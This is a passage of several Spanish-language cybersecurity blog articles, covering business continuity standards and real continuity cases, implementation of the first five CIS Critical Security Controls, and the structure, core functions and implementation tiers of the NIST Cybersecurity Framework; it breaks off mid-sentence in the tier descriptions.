sobre el ejercicio y las pruebas de continuidad y los programas de contingencia proporciona una orientación adecuada a todas las organizaciones sobre el ejercicio, incluidas las actividades de prueba, para los programas de continuidad y de contingencia. Los arreglos para los sistemas de tecnología de la información (TI) también se incluyen en este. ## Comparando los estándares de continuidad del negocio Una forma popular de comparar estándares y pautas de continuidad de negocios similares es utilizar "cruces" o una tabla de comparación que alinee los diferentes estándares uno al lado del otro para que puedan compararse con un conjunto común de criterios. La siguiente tabla compara los tres estándares actualmente aprobados en el Programa de Preparación del Sector Público del Departamento de Seguridad Nacional de los EE. UU. (Conocido como PS-Prep) con los dos estándares más recientes, el ASIS / BSI BCM.01-2010 conjunto y el ISO 22301. La columna de la izquierda enumera los componentes comúnmente observados en los estándares de continuidad de negocio. Las columnas de cada estándar describen dónde se puede encontrar la información para cada categoría. La mayoría de los estándares son preceptivos describiendo lo que se debe hacer. No describen cómo se implementará cada actividad, esto generalmente compete a la organización. La tabla es un punto de partida en el proceso de selección de un estándar. La tabla señala que, esencialmente, cualquier estándar de continuidad de negocio se puede usar en una organización. [Imagen: Tabla comparando las secciones de ISO 22301, ASIS BCM.01, ASIS SPC.1 y NFPA 1600] Todas las organizaciones experimentan cambios a lo largo del tiempo. Algunos cambios son pequeños, como los cambios en el personal y las funciones del trabajo, mientras que otros cambios son extremos, como fusiones, adquisiciones, reubicaciones de sitios, cambios en las aplicaciones y / o sistemas operativos, etc. El cambio hace que este proceso sea continuamente revisado y examinado. Un plan de recuperación de desastres es un documento "vivo" que crece en tamaño y alcance a medida que cambia un negocio. En caso de desastre, el tiempo y el esfuerzo que una organización invirtió en su plan ayudará a asegurar la continuidad de las operaciones del negocio y la estabilidad futura de sus partes interesadas. --- # Casos de continuidad de negocio reales, que nos pueden abrir los ojos URL: https://ciberseguridad.blog/ejemplos-de-continuidad-de-negocio-reales-que-nos-pueden-abrir-los-ojos/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-07-25 Actualizado: 2026-10-01 Tema: Compliance > Un plan de continuidad de negocio es imprescindible. Piénsalo , un error grave o un desastre puede suponer el cierre de tu empresa. ## Fuego en un proveedor de servicios gestionados de CPDs En 2013, un rayo cayó en un edificio de oficinas en Mount Pleasant, Carolina del Sur, causando un incendio. Las oficinas eran de Cantey Technology, una compañía de TI que aloja servidores para más de 200 clientes. El incendio arrasó la infraestructura de red de Cantey, derritiendo cables y quemando su hardware. El equipo se destruyó irreparablemente y la oficina no se pudo usar. Pero los clientes de Cantey nunca notaron la diferencia. Como parte de su plan de continuidad de negocio, Cantey ya había movido los servidores de sus clientes a un centro de datos remoto, donde se almacenaban copias de seguridad continuas. A pesar de que el personal se vio obligado a mudarse a una oficina temporal, sus clientes nunca experimentaron ninguna interrupción en el servicio. ## Un virus informático infecta la red hospitalaria del Reino Unido En esta parte, destacamos uno de los peores ejemplos de continuidad de negocio que vimos en 2016. En noviembre, un desagradable virus informático infectó una red de hospitales en el Reino Unido, conocida como Northern Lincolnshire y Goole NHS Foundation Trust. El virus paralizó sus sistemas y detuvo las operaciones en tres hospitales por separado durante cinco días. Los pacientes fueron literalmente rechazados en la puerta y enviados a otros hospitales. Un informe en Computing.co.uk especuló que no había habido ningún documento de plan de continuidad del negocio. Incluso si hubiera habido, claramente hubo fallos. Estos escenarios de desastre pueden ser casos de vida o muerte en instalaciones de salud. Todas las organizaciones de atención médica deben tener un esquema claro del plan de continuidad del negocio con medidas integrales para responder a un fallo crítico de los sistemas de TI. Si hubiera habido en este caso, los hospitales podrían haber permanecido abiertos. ## Conexión WAN inestable en la compañía eléctrica de Atlanta Después de que una importante compañía electricidad en Georgia sufriera un fallo con una de sus líneas de datos, se tomaron varias medidas proactivas para garantizar que sus sistemas críticos no experimentasen interrupciones en el futuro. La compañía implementó un WARP FatPipe en su Site principal, vinculando dos conexiones para lograr redundancia, y también preparó planes para una tercera línea de datos. Además, la compañía reprodujo sus servidores de misión crítica fuera del site, incorporando su propio sitio WARP failover. Según Disasterrecovery.org, "Cada oficina tiene un WARP, que une líneas de ISP separados conectados por un bucle de fibra. Efectivamente establecieron la conmutación por error de línea de datos en ambas oficinas configurando un solo WARP en cada ubicación. Lograron una solución total de failover del sitio implementando la conmutación por error del sitio entre la recuperación de desastres y las ubicaciones de la oficina principal ". Si bien el problema inicial de la WAN fue mínimo, es un buen ejemplo de una empresa que está planificando en caso de desastre o error grave. ## Deutch Telecom restaura rápidamente el servicio después de un incendio Entre los mejores ejemplos de continuidad de negocio que hemos visto, las soluciones de gestión de incidentes desempeñan cada vez más un papel importante. Tomamos el caso de Deutch Telecom, un incendio peligroso estaba invadiendo una instalación crucial para la compañía. La instalación era un centro de conmutación central, que albergaba importantes cableados de telecomunicaciones y equipos que eran vitales para proporcionar servicio a millones de clientes. La compañía usa un sistema de gestión de incidentes llamado Simba, que alertó al personal sobre el incendio, evaluó el impacto del mismo, activó automáticamente los equipos de respuesta a la gestión de incidentes y envió alertas de emergencia a los 1.600 empleados en Alemania. De hecho, el fuego llegó al edificio y, finalmente, noqueó todo el centro de conmutación. Pero con un sistema de gestión de incidentes eficaz en su lugar, combinado con un diseño de red redundante, la compañía pudo restaurar completamente el servicio en seis horas. --- # Guía práctica para implementar los controles críticos de seguridad URL: https://ciberseguridad.blog/guia-practica-para-implementar-los-controles-criticos-de-seguridad/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-07-18 Actualizado: 2026-10-08 Tema: Operaciones de Seguridad > Los Controles Críticos de Seguridad son un conjunto de acciones priorizadas para proteger nuestra organización y los datos de los vectores de ciberataques. En 2008, los controles críticos de seguridad del Centro de Seguridad de Internet ("Controles CIS") se crearon como una colaboración entre representantes del gobierno de EE. UU. y organizaciones de investigación de seguridad del sector privado. Un conjunto de defensas prácticas específicamente dirigidas a detener los ciberataques, estas defensas propuestas eran de naturaleza técnica y tenían la intención de definir pasos prácticos específicos que una organización podría tomar para evitar que las ciberamenazas más comunes comprometan sus sistemas de información. Los Controles CIS fueron diseñados para responder a la frecuente pregunta: "¿Dónde debería comenzar cuando quiero mejorar mis defensas de ciberseguridad?" Los controles CIS están diseñados para dar prioridad y enfoque, para aprovechar el poder de una gran comunidad de expertos para identificar y apoyar prácticas de gran valor y pasos fundamentales, y para dejar de "admirar el problema". [Imagen: Diagrama de los 20 controles CIS versión 7 agrupados en básicos, fundamentales y organizacionales] ## Establecer expectativas para las organizaciones Los controles CIS adoptan el principio Pareto 80/20, la idea de que tomar solo una pequeña parte de todas las medidas de seguridad que posiblemente pueda tomar, produce un porcentaje muy grande del beneficio de tomar todas esas acciones posibles. Mientras que los Controles CIS se centran en la acción técnica, los desarrolladores de los Controles reconocieron que muchas de estas recomendaciones obligarían a los equipos técnicos operacionales a cambiar las prácticas para mejorar tanto los controles operacionales como la seguridad, reevaluar sus estrategias básicas de defensa y ser más estructurados y disciplinado en sus actividades. No hay una solución de "caja mágica" para la ciberseguridad. Por lo tanto, el éxito con los Controles de CIS (o cualquier programa defensivo) depende de que las organizaciones desarrollen y operen a partir de una nueva hoja de ruta integral para mejorar la ciberdefensa. Cuando se introduce a algunas organizaciones a los Controles CIS, pueden desanimarse pensando que los Controles reflejan un objetivo demasiado alto no alcanzables por la organización. En la práctica, esto no podría estar más lejos de la verdad; sin embargo, la implementación exitosa de los controles requerirá que muchas organizaciones cambien su forma de pensar sobre la ciberseguridad y la forma en que abordan las operaciones y la defensa de TI. La información y la tecnología que la respalda es ahora el alma de toda organización. Los empleados ya no pueden instalar software al azar o viajar con datos confidenciales en sus bolsillos. Se ha establecido que la aceptación cultural de los cambios necesarios para implementar los controles técnicos es necesariamente requisito previo para el éxito. Este es probablemente el obstáculo más importante que la mayoría de las organizaciones deben superar. En este sentido, la compra y el refuerzo de la alta gerencia son esenciales. Muchas organizaciones han tenido éxito en la implementación de los controles en un enfoque por etapas o fases, abordando algunos controles y subcontroles de manera temprana e implementando otros de acuerdo con un plan coordinado y aprobado por la administración superior. Además, dividir el trabajo de implementación de los controles entre varios individuos / equipos también ha demostrado acelerar el progreso de la implementación. Las organizaciones rara vez implementan cada subcontrol descrito en los controles CIS (la versión 6.0, por ejemplo, tiene 149 subcontroles). La mayoría de los subcontroles son fundamentales para la ciberdefensa efectiva, mientras que otros brindan asesoramiento sobre técnicas avanzadas. Las organizaciones que tienen la seguridad más sólida están continuamente revisando y actualizando su postura en ciberseguridad y supervisan sus defensas a la luz de las amenazas en evolución. Las organizaciones que implementan los Controles CIS deben asumir que sus esfuerzos tomarán, en promedio, entre uno y tres años para alcanzar un nivel inicial de conformidad con los Controles CIS más críticos (es decir, los primeros cinco) y posiblemente hasta cinco años de esfuerzo dedicado para implementar con éxito todos o la mayoría de los controles. En última instancia, la velocidad de implementación dependerá en gran medida de las inversiones comprometidas con el esfuerzo y el nivel de apoyo de la direción. ## Cómo implantar los controles críticos de ciberseguridad Las organizaciones que estén considerando implementar los Controles CIS deben planificar cuidadosamente cómo lograrán una mejor "ciberhigiene". La mayoría de las organizaciones encontrarán que la creación de una estructura organizacional para los Controles CIS ayudará a asegurar el éxito. Algunas organizaciones pueden establecer un programa de "Gobierno, Riesgo y Cumplimiento (GRC)". Otras tácticas exitosas incluyen asignar administradores de programas para coordinar las tareas relacionadas con la implementación de controles CIS por administradores de servidores, especialistas en estaciones de trabajo, ingenieros de redes, desarrolladores de software e incluso profesionales externos a la tecnología de la información como especialistas en recursos humanos, capacitadores y oficiales de cumplimiento. . Muchas organizaciones ya estan siguiendo una arquitectura de seguridad utilizando como base otras normas o regulaciones de seguridad. En muchas organizaciones, los regímenes de seguridad como el Framework de ciberseguridad NIST, la alineación del NIST y la serie ISO 27000 o las reglamentaciones como PCI DSS, HIPAA, NERC CIP, FISMA ya se están utilizando para definir los controles de ciberseguridad. Buscar un estándar como NIST 800-53 no impide que las organizaciones usen los Controles CIS como una "rampa" efectiva hacia el logro de estándares adicionales. Las asignaciones se han definido para los Controles de CIS para todos los principales estándares de seguridad para mostrar cómo la implementación de los Controles ayudará a una organización a priorizar su implementación de otro estándar. Algunas organizaciones pueden creer que el enfoque exclusivamente técnico y prescriptivo de los controles CIS para la defensa de la ciberseguridad está más allá de sus recursos. En realidad, un enfoque de implementación por fases ayuda a garantizar los beneficios más importantes logrados mediante la implementación de los controles de mayor prioridad (es decir, los primeros cinco controles CIS). De hecho, la implementación del inventario de activos (Controles CIS 1 y 2) y las configuraciones estándar (Control 3) a menudo resulta en ahorros de costes generales para la empresa, ya que se requieren menos sistemas y administradores de red para administrar el entorno de ciberseguridad de la organización. El coste de implementación de los controles CIS será proporcional al tamaño de la organización. Las organizaciones más grandes pueden gastar más recursos generales para la defensa, pero las organizaciones más pequeñas probablemente gastarán un mayor porcentaje de su presupuesto en defensa debido a las economías de escala. Las organizaciones deben darse cuenta de que proteger a una organización de los ciberataques se ha convertido en un coste necesario asociado con el uso de la tecnología como una herramienta de negocio en la era de Internet. Hay algunas consideraciones prácticas que debemos hacer al embarcarnos en este viaje. Mantener estas sugerencias en mente y desarrollarlas en el plan del programa ayudará a conseguir el éxito. Específicamente, una organización debería: - Tomar una decisión formal y consciente de alto nivel para hacer que los Controles CIS sean parte del estándar de defensa de la organización. La alta gerencia y la Junta de Directores deberían estar "a bordo" para recibir apoyo y rendición de cuentas. - Asignar un administrador del programa, que estará cualificado y será responsable de la implementación de los controles CIS. - Decidir quién será responsable de la sostenibilidad a largo plazo del mantenimiento de las defensas de ciberseguridad. - Comenzar con un análisis de brechas, evaluación o auditoría del estado actual de la organización en los Controles CIS y desarrolla un plan de implementación programado con enfoque prioritario en los primeros cinco controles. - Documentar el plan a largo plazo (3-5 años) para implementar defensas de ciberseguridad que no sean parte de la estrategia defensiva de la organización. - Insertar las definiciones u objetivos de los Controles CIS en los documentos de la organización, creando políticas de seguridad para optimizar su implementación. - Asegurar que los auditores internos y externos usan los controles CIS como parte de su punto de referencia para evaluar la postura de seguridad de la organización. - Educar a los miembros de la fuerza laboral sobre los objetivos de seguridad de la organización y solicite su ayuda como parte de la defensa a largo plazo de los datos de la organización. Si bien puede haber otros pasos que ayuden a mejorar las posibilidades de éxito, estas consideraciones son un buen punto de partida para estructurar el programa defensivo de una organización. ## Los 5 controles críticos de ciberseguridad por donde comenzar Los primeros cinco controles de seguridad crítica de CIS a menudo se denominan "higiene" de ciberseguridad, ya que varios estudios muestran que la implementación de los primeros cinco controles proporciona una defensa eficaz contra los ciberataques más comunes (~ 80% de los ataques). En un esfuerzo por ayudar a las organizaciones a implementar prácticamente los primeros cinco controles CIS, los objetivos de estos controles se describen claramente a continuación. Estos objetivos de nivel superior se deben utilizar al determinar cómo se implementarán los primeros cinco controles CIS y sus subcontroles. ### CSC 1 | Inventario de dispositivos autorizados y no autorizados. El objetivo de este control es ayudar a las organizaciones a definir una línea de base de lo que se debe defender. Sin una comprensión de qué dispositivos y datos están conectados, no pueden ser defendidos. Los escáneres (tanto activos como pasivos) colocados en la red de la organización que pueden detectar dispositivos es el lugar para comenzar. Este proceso de inventario debe ser lo más completo posible. Después de que una organización haya inventariado con precisión sus sistemas, el siguiente paso es evitar que los dispositivos no autorizados se unan a una red: aquí es donde se destaca la implementación de la autenticación a nivel de red. El objetivo inicial no es evitar que los atacantes se unan a la red, sino también comprender qué hay en la red para poder defenderla. ### CSC 2 | Inventario de software autorizado y no autorizado. El objetivo de este control es garantizar que solo se permite la ejecución de software autorizado en los sistemas de información de una organización. Si bien un inventario de software es importante, el control más importante que una organización puede implementar aquí es la inclusión en la lista blanca de aplicaciones, que limita la capacidad de ejecutar aplicaciones solo a aquellas que están explícitamente aprobadas. Este Control a menudo se considera uno de los más efectivos para prevenir y detectar ataques de ciberseguridad, aunque la lista blanca de aplicaciones a menudo no se implementa fácilmente. Este esfuerzo requerirá que una organización reconsidere sus modelos operativos: los usuarios ya no podrán instalar el software cuando y donde quieran. Pero este Control, ya implementado con éxito por numerosas organizaciones, probablemente proporcionará devoluciones inmediatas a una organización que intenta prevenir y detectar ataques específicos. ### CSC 3 | Configuraciones seguras de hardware y software en dispositivos móviles, portátiles, estaciones de trabajo y servidores. Por defecto, la mayoría de los sistemas tecnológicos se instalan con un enfoque en la facilidad de uso y no necesariamente en la seguridad. Los sistemas pueden tener la capacidad de ser protegidos, pero es probable que existan configuraciones que un sistema debe tener para garantizar una alta seguridad. La mayoría de las organizaciones ya cuentan con los sistemas de tecnología necesarios para configurar de manera segura sus sistemas a escala. Los Objetos de directiva de grupo de Microsoft Active Directory y Unix Puppet o Chef ya están comúnmente establecidos en las organizaciones. Al utilizar estándares de configuración o puntos de referencia, como los definidos por el Centro para la Seguridad de Internet, o que se encuentran en el Repositorio del Programa de Lista de Verificación Nacional del NIST, este control es alcanzable por la mayoría de las organizaciones. ### CSC 4 | Evaluación continua de la vulnerabilidad y remediación. El objetivo de este Control es comprender las debilidades técnicas del software que existen en los sistemas de información de una organización y eliminar o remediar esas debilidades. Las organizaciones exitosas implementan sistemas de administración de parches que cubren vulnerabilidades tanto de sistemas operativos como de aplicaciones de terceros. Esto permite la instalación automática, continua y proactiva de las actualizaciones para abordar las vulnerabilidades del software. Además de los sistemas de administración de parches, las organizaciones deben implementar un sistema comercial de administración de vulnerabilidades para darse la posibilidad de detectar dónde existen vulnerabilidades de software explotables actualmente para que puedan ser remediadas. ### CSC 5 | Uso controlado de privilegios administrativos. El objetivo de este Control es garantizar que los miembros de la fuerza laboral solo tengan los derechos, privilegios y permisos del sistema que necesitan para realizar su trabajo, ni más ni menos de lo necesario. Desafortunadamente, por razones de velocidad y conveniencia, muchas organizaciones permiten que el personal tenga un sistema local o incluso derechos de administrador de dominio que son demasiado generosos y abren la puerta a abusos, accidentales o de otro tipo. La respuesta simple para este Control es eliminar permisos o permisos innecesarios del sistema. Afortunadamente, para las organizaciones más grandes que luchan por realizar esta tarea a gran escala, existen proveedores de administración de privilegios que pueden proporcionar soluciones de administración de puntos finales para ayudar a disminuir la carga administrativa. ### Conclusiones El objetivo de los controles de CIS es describir qué pueden hacer las organizaciones para defender eficazmente sus sistemas de información contra los ataques más comunes y proporcionar un enfoque gradual para implementar una defensa de ciberseguridad más sólida. Los controles de CIS deben ser el criterio para que las organizaciones intenten comprender si han cumplido con un estándar de cuidado a la defensiva. Los controles continuarán evolucionando y cambiando para reflejar las amenazas más actuales que enfrentan los sistemas de información. Se puede lograr una defensa cibernética efectiva, con mucho trabajo y dedicación. Como sabemos, rara vez recompensas y reconocimientos dignos vienen fácilmente. Las organizaciones deben suponer que implementar y mantener estas defensas técnicas será un programa continuo, no un proyecto a corto plazo con una fecha de finalización definida. Al igual que con cualquier programa, los recursos apropiados, como el tiempo, los presupuestos y las personas, deben dedicarse al esfuerzo para garantizar su éxito. --- # Cómo implantar el Framework NIST URL: https://ciberseguridad.blog/como-implantar-el-framework-nist/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-07-07 Actualizado: 2026-10-08 Tema: Compliance > El NIST es un framework de ciberseguridad integral y flexible, de naturaleza universal y sobre todo, imprescindible para tu organización. ¡ CONÓCELO ! El Framework NIST es un enfoque basado en el riesgo para gestionar la ciberseguridad, y está compuesto por tres partes: el núcleo del marco, los niveles de implementación del marco y los perfiles del mismo. Cada componente del framework refuerza la conexión entre los impulsores del negocio y las actividades de ciberseguridad. Ver el vídeo en YouTube - El núcleo del framework es un conjunto de actividades de seguridad cibernética, resultados deseados y referencias aplicables que son comunes en todos los sectores de infraestructura críticas. El núcleo presenta estándares, directrices y prácticas de la industria de una manera que permite la comunicación de las actividades y los resultados de ciberseguridad en toda la organización desde el nivel ejecutivo hasta el nivel de implementación / operaciones. El Core consta de cinco Funciones simultáneas y continuas: Identificar, Proteger, Detectar, Responder, Recuperar. Cuando se consideran juntas, estas funciones proporcionan una visión estratégica de alto nivel del ciclo de vida de la administración de riesgos de ciberseguridad de una organización. El núcleo del framework identifica categorías y subcategorías clave subyacentes para cada función y las compara con ejemplos de referencias informativas, como estándares, directrices y prácticas existentes para cada subcategoría. - Los Niveles de Implementación del framework ("TIERs") proporcionan un contexto sobre cómo una organización considera el riesgo de ciberseguridad y los procesos establecidos para gestionar ese riesgo. Los niveles describen el grado en que las prácticas de gestión de riesgos de ciberseguridad de una organización exhiben las características definidas en el framework (por ejemplo, consciente de riesgos y amenazas, repetible y adaptativo). Los Niveles caracterizan las prácticas de una organización en un rango, desde Parcial (TIER 1) hasta Adaptativo (TIER 4). Estos Niveles reflejan una progresión de respuestas informales y reactivas a enfoques que son ágiles y están informados sobre riesgos. Durante el proceso de selección de niveles, una organización debe considerar sus prácticas actuales de administración de riesgos, el entorno de amenazas, los requisitos legales y reglamentarios, los objetivos comerciales / de la misión y las limitaciones organizacionales. - Un Perfil del framework ("Perfil") representa los resultados basados en las necesidades comerciales que una organización ha seleccionado de las Categorías y Subcategorías del Marco. El perfil se puede caracterizar como la alineación de estándares, directrices y prácticas con el núcleo del framework en un escenario de implementación particular. Los perfiles se pueden utilizar para identificar oportunidades para mejorar la postura de ciberseguridad comparando un perfil "actual" (el estado "tal cual") con un perfil de "objetivo" (el estado "a ser"). Para desarrollar un perfil, una organización puede revisar todas las categorías y subcategorías y, en función de los impulsores del negocio y una evaluación de riesgos, determinar cuáles son los más importantes; pueden agregar categorías y subcategorías según sea necesario para abordar los riesgos de la organización. El perfil actual se puede usar para apoyar la priorización y la medición del progreso hacia el Perfil objetivo, al tiempo que se tienen en cuenta otras necesidades comerciales, incluida la rentabilidad y la innovación. Los perfiles se pueden usar para realizar autoevaluaciones y comunicarse dentro de una organización o entre organizaciones. ## Gestión de riesgos La gestión de riesgos es el proceso continuo de identificación, evaluación y responder al riesgo. Para administrar el riesgo, las organizaciones deben comprender la probabilidad de que ocurra un evento y el impacto resultante. Con esta información, las organizaciones pueden determinar el nivel aceptable de riesgo para la prestación de servicios y pueden expresar esto como su tolerancia al riesgo. Con una comprensión de la tolerancia al riesgo, las organizaciones pueden priorizar las actividades de ciberseguridad, permitiendo a las organizaciones tomar decisiones informadas sobre los gastos de esta. La implementación de programas de gestión de riesgos ofrece a las organizaciones la capacidad de cuantificar y comunicar los ajustes a sus programas de seguridad cibernética. Las organizaciones pueden optar por manejar el riesgo de diferentes maneras, incluida la mitigación, la transferencia, la prevención o la aceptación del riesgo, según el impacto potencial en la prestación de los servicios críticos. El framework NIST utiliza procesos de gestión de riesgos para permitir que las organizaciones informen y prioricen las decisiones relacionadas con la ciberseguridad. Es compatible con las evaluaciones de riesgos recurrentes y la validación de los impulsores del negocio para ayudar a las organizaciones a seleccionar estados objetivo para actividades de ciberseguridad que reflejen los resultados deseados. Por lo tanto, el framework NIST da a las organizaciones la capacidad de seleccionar y dirigir mejoras dinámicas en la gestión de riesgos de ciberseguridad para los entornos de TI e ICS. El Marco es adaptable para proporcionar una implementación flexible y basada en el riesgo que se puede utilizar con una amplia gama de procesos de gestión de riesgos de ciberseguridad, cómo por ejemplo la (ISO) 31000: 20093 o la ISO / IEC 27005: 20114. ## Proceso de implantación de Framework NIST El framewok NIST proporciona un lenguaje común para comprender, gestionar y expresar el riesgo de ciberseguridad tanto internamente como externamente. Se puede usar para ayudar a identificar y priorizar acciones para reducir el riesgo de ciberseguridad, y es una herramienta para alinear los enfoques de políticas, negocios y tecnología para manejar dicho riesgo. Se puede usar para administrar el riesgo de ciberseguridad en todas las organizaciones o se puede enfocar en la entrega de servicios críticos dentro de una organización. Los diferentes tipos de entidades, incluidas las estructuras de coordinación del sector, las asociaciones y las organizaciones, pueden usar el framewok NIST para diferentes propósitos, incluida la creación de Perfiles comunes. [Imagen: Procesos NIST] El core del framewok NIST proporciona un conjunto de actividades para lograr resultados específicos de ciberseguridad y referencias de ejemplos de orientación para lograr esos resultados. El core no es una lista de verificación de las acciones a realizar. Presenta los resultados clave de ciberseguridad identificados por la industria como útiles para gestionar el riesgo de ciberseguridad. El core comprende cuatro elementos: Funciones, Categorías, Subcategorías y Referencias Informativas. [Imagen: Catategorias-Framework-NIST] Los elementos core del Framework NIST trabajan juntos de la siguiente manera: - Las funciones (Functions) organizan actividades básicas de ciberseguridad en su nivel más alto. Estas funciones son Identificar, Proteger, Detectar, Responder y Recuperar. Ayudan a una organización a expresar su gestión del riesgo de ciberseguridad organizando información, permitiendo decisiones de gestión de riesgos, abordando amenazas y mejorando y aprendiendo de actividades previas. Las funciones también se alinean con las metodologías existentes para la gestión de incidentes y ayudan a mostrar el impacto de las inversiones en ciberseguridad. Por ejemplo, las inversiones en planificación y ejercicios apoyan la respuesta oportuna y las acciones de recuperación, lo que resulta en un impacto reducido en la prestación de servicios. - Las categorías son las subdivisiones de una Función en grupos de resultados de ciberseguridad estrechamente vinculados a las necesidades programáticas y las actividades particulares. Los ejemplos de categorías incluyen "Gestión de activos", "Control de acceso" y "Procesos de detección". - Las subcategorías dividen aún más una Categoría en resultados específicos de actividades técnicas y / o de gestión. Proporcionan un conjunto de resultados que, aunque no son exhaustivos, ayudan a respaldar el logro de los resultados en cada categoría. Algunos ejemplos de subcategorías incluyen "Los sistemas de información externos están catalogados", "Los datos en reposo están protegidos" y "Las notificaciones de los sistemas de detección se investigan". - Las referencias informativas son secciones específicas de normas, directrices y prácticas comunes entre sectores de infraestructura crítica que ilustran un método para lograr los resultados asociados con cada subcategoría. Las referencias informativas presentadas en el núcleo del marco son ilustrativas y no exhaustivas. Se basan en la orientación intersectorial a la que se hace referencia con más frecuencia durante el proceso de desarrollo del Marco. Definimos a continuación las cinco funciones básicas del framewok NIST. Estas funciones no están destinadas a formar una ruta serial, o conducir a un estado final deseado estático. Por el contrario, las funciones se pueden realizar concurrentemente y continuamente para formar una cultura operativa que aborde el riesgo dinámico de ciberseguridad. - Identificar: Desarrollar la comprensión organizacional para administrar el riesgo de ciberseguridad para sistemas, activos, datos y capacidades.Las actividades en la función identificar son fundamentales para el uso efectivo del framewok NIST. Comprender el contexto empresarial, los recursos que respaldan las funciones críticas y los riesgos de ciberseguridad relacionados permite a una organización enfocarse y priorizar sus esfuerzos, de manera consistente con su estrategia de gestión de riesgos y sus necesidades comerciales. Los ejemplos de Categorías de resultados dentro de esta Función incluyen: Gestión de activos Ambiente de negocios Gobernancia Evaluación de riesgos Estrategia de Gestión de Riesgos - Proteger: Desarrollar e implementar las salvaguardas apropiadas para garantizar la entrega de servicios de infraestructura críticos.La función de protección admite la capacidad de limitar o contener el impacto de un posible evento de ciberseguridad. Los ejemplos de Categorías de resultados dentro de esta Función incluyen: Control de acceso Conciencia y Entrenamiento Seguridad de datos Procesos y procedimientos de protección de la información Mantenimiento Tecnología de protección - Detectar: desarrolle e implemente las actividades apropiadas para identificar la ocurrencia de un evento de ciberseguridad.La función de detección permite el descubrimiento oportuno de eventos de ciberseguridad. Los ejemplos de Categorías de resultados dentro de esta Función incluyen: Anomalías y Eventos Monitorización continua de seguridad Procesos de detección. - Responder: desarrollar e implementar las actividades apropiadas para tomar medidas con respecto a un evento de ciberseguridad detectado. La función de respuesta respalda la capacidad de contener el impacto de un posible evento de ciberseguridad. Los ejemplos de Categorías de resultados dentro de esta Función incluyen: Planificación de respuesta Comunicaciones Análisis Mitigación Mejoras - Recuperar: Desarrolla e implementa las actividades apropiadas para mantener los planes de resiliencia y restaurar las capacidades o servicios que se vieron afectados debido a un evento de ciberseguridad. La función de recuperación admite la recuperación oportuna a las operaciones normales para reducir el impacto de un evento de ciberseguridad. Los ejemplos de Categorías de resultados dentro de esta Función incluyen: Planificación de recuperación Mejoras Comunicaciones ## Niveles TIER en el Framework NIST Los Niveles de Implementación del Framework NIST ("TIERs") proporcionan un contexto sobre cómo una organización considera el riesgo de ciberseguridad y los procesos establecidos para gestionar ese riesgo. Los Niveles van desde Parcial (TIER 1) hasta Adaptativo (TIER 4) y describen un grado creciente de rigor y sofisticación en prácticas de gestión de riesgos de ciberseguridad y hasta qué punto la gestión de riesgos de ciberseguridad está informada por necesidades comerciales y está integrada en el riesgo general de una organización. Las consideraciones de gestión de riesgos incluyen muchos aspectos de ciberseguridad, incluido el grado en que las consideraciones de privacidad y libertades civiles se integran en la gestión de riesgos de ciberseguridad de una organización y posibles respuestas de riesgo. El proceso de selección de niveles considera las prácticas de gestión de riesgos actuales de una organización, el entorno de amenazas, los requisitos legales y reglamentarios, los objetivos comerciales / de misión y las limitaciones organizacionales. Las organizaciones deben determinar el TIER deseado, asegurando que el nivel seleccionado cumpla con los objetivos de la organización, sea factible de implementar y reduzca el riesgo de ciberseguridad a los activos y recursos críticos a niveles aceptables para la organización. [Imagen: Niveles-TIER-NIST] ### TIER 1: Parcial - Proceso de gestión de riesgos: Las prácticas de gestión de riesgos de ciberseguridad de la organización no están formalizadas, y el riesgo se gestiona de forma ad hoc y, en ocasiones, de forma reactiva. La priorización de las actividades de ciberseguridad puede no estar directamente informada por los objetivos de riesgo de la organización, el entorno de amenaza o los requisitos de negocios / misión. - Programa integrado de gestión de riesgos: Existe una conciencia limitada sobre el riesgo de seguridad cibernética a nivel organizacional y no se ha establecido un enfoque de toda la organización para gestionar el riesgo de ciberseguridad. La organización implementa la gestión del riesgo de ciberseguridad en forma irregular caso por caso debido a la experiencia variada o la información obtenida de fuentes externas. La organización puede no tener procesos que permitan compartir información de ciberseguridad dentro de la organización. - Participación externa: La organización puede no tener los procesos establecidos para participar en la coordinación o colaboración con otras entidades. ### TIER 2: Riesgos de información - Proceso de gestión de riesgos: Las prácticas de gestión de riesgos son aprobadas por la administración pero no pueden establecerse como políticas de toda la organización. La priorización de las actividades de ciberseguridad está directamente relacionada con los objetivos de riesgo de la organización, el entorno de amenazas o los requisitos de negocios / misiones. - Programa integrado de gestión de riesgos: Existe una conciencia del riesgo de ciberseguridad a nivel organizacional, pero no se ha establecido un enfoque de toda la organización para gestionar el riesgo de ciberseguridad. Los procesos y procedimientos informados por el riesgo, aprobados por la gerencia, se definen e implementan, y el personal cuenta con los recursos adecuados para realizar sus tareas de ciberseguridad. La información de ciberseguridad se comparte dentro de la organización de manera informal. - Participación externa: La organización conoce su rol en el ecosistema más grande, pero no ha formalizado sus capacidades para interactuar y compartir información externamente. ### TIER 3: Repetible - Proceso de gestión de riesgos: Las prácticas de gestión de riesgos de la organización se aprueban formalmente y se expresan como políticas. Las prácticas de ciberseguridad organizacional se actualizan periódicamente en función de la aplicación de los procesos de gestión de riesgos a los cambios en los requisitos empresariales / de la misión y un panorama cambiante de amenazas y tecnología. - Programa integrado de gestión de riesgos: Existe un enfoque de toda la organización para gestionar el riesgo de ciberseguridad. Las políticas, procesos y procedimientos informados sobre riesgos se definen, implementan según lo previsto y se revisan. Se han implementado métodos consistentes para responder de manera efectiva a los cambios en el riesgo. El personal posee el conocimiento y las habilidades para realizar sus roles y responsabilidades asignados. - Participación externa: La organización entiende sus dependencias y socios y recibe información de estos socios que permite la colaboración y las decisiones de gestión basadas en riesgos dentro de la organización en respuesta a los eventos. ### TIER 3: Adaptable - Proceso de gestión de riesgos: La organización adapta sus prácticas de ciberseguridad en función de las lecciones aprendidas y los indicadores predictivos derivados de las actividades de ciberseguridad anteriores y actuales. A través de un proceso de mejora continua que incorpora prácticas y tecnologías avanzadas de ciberseguridad, la organización se adapta activamente a un entorno cambiante de ciberseguridad y responde a las amenazas cambiantes y sofisticadas de manera oportuna. - Programa integrado de gestión de riesgos: Existe un enfoque de toda la organización para gestionar el riesgo de ciberseguridad que utiliza políticas, procesos y procedimientos informados sobre riesgos para abordar posibles eventos de ciberseguridad. La gestión del riesgo de ciberseguridad forma parte de la cultura organizacional y evoluciona a partir de la conciencia de las actividades previas, la información compartida por otras fuentes y el conocimiento continuo de las actividades en sus sistemas y redes. - Participación externa: La organización gestiona los riesgos y comparte activamente la información con los socios para garantizar que la información precisa y actualizada se distribuya y consuma para mejorar la ciberseguridad antes de que se 